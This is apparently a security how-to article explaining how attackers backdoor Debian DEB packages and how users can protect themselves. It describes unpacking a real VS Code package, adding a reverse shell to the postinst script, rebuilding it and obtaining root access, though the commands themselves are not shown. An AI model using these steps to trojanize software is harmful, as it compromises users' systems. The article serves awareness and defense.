DEB files are software packages that are the primary format of shipping software on Debian-based Linux distributions.
To install DEB packages, you have to use a package manager like dpkg with root permissions. Attackers take advantage of this and inject backdoors into these packages. When you install them with dpkg or any other package manager, the malicious code also gets executed alongside and compromises your system.
Let’s explore exactly how DEB packages are backdoored and what you can do to protect yourself.
How Are DEB Packages Backdoored?
Before you understand how DEB packages are backdoored, let’s explore what’s inside a DEB package. For demonstration, I’ll be downloading the Microsoft Visual Studio Code DEB package from the official Microsoft website. This is the same package you’d download if you want to install VS Code on Linux.
Download:Visual Studio Code
Now that you have the target package downloaded, it’s time to unpack it. you may unpack a DEB package using thedpkg-debcommand with the-Rflag followed by the path to store the contents:
This should extract the contents of the VS Code package.
Moving into the folder you’ll find multiple directories, however, our interest lies only in theDEBIANdirectory. This directory contains maintainer scripts that get executed during the installation with root privileges. As you might’ve figured out already, the attackers modify the scripts in this directory.
For demonstration, I’ll modify thepostinstscript and add a simple one-liner Bash reverse TCP shell. As the name suggests, it’s a script that gets executed after the package is installed on the system.
It contains commands that finalize the configurations such as setting up symbolic links, dependency handling, and more. You can find tons of different reverse shells on the internet. Most of them will work the same. Here’s the sample reverse shell one-liner:
Explanation of the command:
For those uninitiated, a reverse shell is a type of code that, when executed on the target machine, initiates a connection back to the attacker’s machine. Reverse shells are a great way to bypass firewall restrictions as the traffic is being generated from the machine behind the firewall.
Here’s how the modified script looks like:
As you can see, everything is the same but only one line has been added, i.e., our Bash reverse shell. Now you need to build the files back into the “.deb” format. Simply use thedpkgcommand with the–buildflag or usedpkg-debwith the-bflag followed by the path of the extracted contents:
Now the backdoored DEB package is ready to be shipped on malicious sites. Let’s simulate a scenario where a victim has downloaded the DEB package onto their system and is installing it as any other regular package.
The top terminal pane is for the victim’s POV and the bottom one is the attacker’s POV. The victim is installing the package withsudo dpkg -iand the attacker is patiently listening for incoming connections using thenetcatcommand in Linux.
As soon as the installation finishes, notice that the attacker gets the reverse shell connection and now has root access to the victim’s system. Now you know how DEB packages are backdoored. Let’s now learn how you’re able to protect yourself.
How to Detect if a DEB Package Is Malicious
Now that you know that infected DEB packages are a thing, you must be wondering how to find infected ones. For starters, you’re able to try using aLinux antivirus softwarelike ClamAV. Unfortunately, when a ClamAV scan was run on the package it didn’t flag it as malicious. Here’s the result of the scan:
So unless you have a premium antivirus solution in place (which isn’t a guarantee that you won’t get hacked), it’s quite hard to detect malicious DEB packages. Let’s try using a cloud solution like the VirusTotal website:
As you can see VirusTotal didn’t detect anything wrong with it. Well, the only way to protect yourself against such threats is to follow basic security hygiene like not downloading files from unknown sources, alwayschecking the hash of a file, and in general, avoiding installing shady software.
The internet is full of such threats. The only way to surf without losing your data is to have your wits about you and browse trusted sites. Additionally, for Linux, you should also try finding if the software you’re downloading has anAppImage variantas they are self-contained and can be sandboxed and thus, kept out of contact with your system.
DEB packages aren’t inherently bad, however, attackers can easily weaponize and ship them to unsuspecting users. As demonstrated, a DEB package can be easily opened up and modified to add custom code with only a few commands, making it a common vector for shipping malware.
Even simple backdoors on DEB packages go uncaught by the top antivirus solutions. So the best thing to do is to play safe, carry your common sense as you surf the web, and always download software only from official download sites or community-trusted sites.
Secure Your Linux PC by Installing Security Tools
Now that you’re aware of the security risks that come with installing DEB packages from new or unknown sites, you should be cautious when installing new software. However, just being careful of what you install isn’t enough. Your Linux system can be a target of network attacks as well.
To ensure that you’re safe in the event of a network attack, you should consider installing network security tools.
